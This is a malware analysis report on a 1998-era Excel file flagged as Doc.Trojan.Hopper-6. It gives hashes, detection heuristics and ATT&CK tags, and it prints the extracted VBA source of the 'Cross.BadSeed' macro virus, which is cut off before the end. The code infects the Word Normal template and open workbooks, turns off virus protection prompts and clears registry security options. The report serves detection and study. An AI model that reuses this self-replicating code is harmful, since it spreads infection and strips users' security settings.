Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 95f8bb8620578e03…

MALICIOUS

Office (OLE)

23.0 KB Created: 1998-12-08 08:08:44 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 393f22b89c16d3d59c8048893cf43638 SHA-1: 083a935bfa63d73f2cbc295a43a6872053640f90 SHA-256: 95f8bb8620578e03386fc5b8aa6de94ac6484563bd6bf0cad8dcf236aa7883bf
220 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1546.003 Event Triggered Execution: Windows Management Instrumentation

This Excel file contains VBA macros that attempt to infect other documents and potentially establish persistence. The macros utilize CreateObject and GetObject calls, common for malicious Office documents. The ClamAV detection 'Doc.Trojan.Hopper-6' further indicates malicious intent. The script attempts to infect the NormalTemplate and ActiveDocument, and potentially creates a new workbook named 'Book1.' in the startup path.

Heuristics 4

  • ClamAV: Doc.Trojan.Hopper-6 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Hopper-6
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5305 bytes
SHA-256: 261dfa0c080923ca70557079becba7f288227d481f182f9b46db56d8688fb187
Detection
ClamAV: Doc.Trojan.Hopper-6
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'<!--1nternal-->
'Cross.BadSeed v0.3 /1nternal
Private InRoutine As Boolean
Private Sub Document_Close()
    On Error Resume Next
    Options.SaveNormalPrompt = False
    Options.ConfirmConversions = False
    Options.VirusProtection = False
    Set NT = NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule
    Set AD = ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule
    If NT.Lines(1, 1) <> "'<!--1nternal-->" Then
        NT.DeleteLines 1, NT.CountOfLines
        For i = 1 To 90
            NT.InsertLines i, AD.Lines(i, 1)
        Next
    Else
        Call WackExcel
    End If
    If AD.Lines(1, 1) <> "'<!--1nternal-->" Then
        AD.DeleteLines 1, AD.CountOfLines
        For i = 1 To 90
            AD.InsertLines i, NT.Lines(i, 1)
        Next
    End If
    If Day(Now) = 15 And (Int((15 * Rnd) + 1) = 1) Then
        MsgBox ("Cross.BadSeed v0.3 /1nternal")
    End If
End Sub
Private Sub Workbook_Deactivate()
    On Error Resume Next
    If UCase(Dir(Application.StartupPath + "\Book1.")) <> "BOOK1" And InRoutine <> True Then
        InRoutine = True
        Call WackWord
        Workbooks.Add.SaveAs FileName:=Application.StartupPath & "\Book1.", FileFormat:=xlNormal, AddToMru:=False
        InfectBook ("Book1.")
        Workbooks("Book1.").Close SaveChanges:=True
    End If
    For i = 1 To Workbooks.Count
        InfectBook (i)
    Next
    If Day(Now) = 1 And (Int((15 * Rnd) + 1) = 1) Then
        MsgBox ("Cross.BadSeed v0.3 /1nternal")
    End If
End Sub
Private Sub InfectBook(Booknum)
        If Workbooks(Booknum).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(1, 1) <> "'<!--1nternal-->" Then
            For y = 1 To 90
                Workbooks(Booknum).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.InsertLines y, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(y, 1)
            Next
        End If
End Sub
Private Sub WackWord()
    On Error Resume Next
    Set WordObj = GetObject(, "Word.Application")
    If WordObj = "" Then
        Set WordObj = CreateObject("Word.Application")
        Quit = True
    End If
    Set NT = WordObj.NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule
    If NT.Lines(1, 1) <> "'<!--1nternal-->" Then
        WordObj.Options.SaveNormalPrompt = False
        NT.DeleteLines 1, NT.CountOfLines
        NT.InsertLines 1, "Public Sub DisableAV()"
        NT.InsertLines 2, " System.PrivateProfileString(" + Chr(34) + Chr(34) + ", " + Chr(34) + "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel" + Chr(34) + ", " + Chr(34) + "Options6" + Chr(34) + ") = " + Chr(34) + Chr(34)
        NT.InsertLines 3, " System.PrivateProfileString(" + Chr(34) + Chr(34) + ", " + Chr(34) + "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel" + Chr(34) + ", " + Chr(34) + "Options6" + Chr(34) + ") = " + Chr(34) + Chr(34)
        NT.InsertLines 4, "End Sub"
        WordObj.Run "Normal.ThisDocument.DisableAV"
        NT.DeleteLines 1, NT.CountOfLines
        For i = 1 To 90
            NT.InsertLines i, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(i, 1)
        Next
    End If
    Set NT = Nothing
    If Quit = True Then WordObj.Quit
End Sub
Private Sub WackExcel()
    On Error Resume Next
    Set xlApp = CreateObject("Excel.Application")
    If UCase(Dir(xlApp.Application.StartupPath + "\Book1.")) <> UCase("BOOK1") Then
        On Error Resume Next
        System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = ""
        System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Exce
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.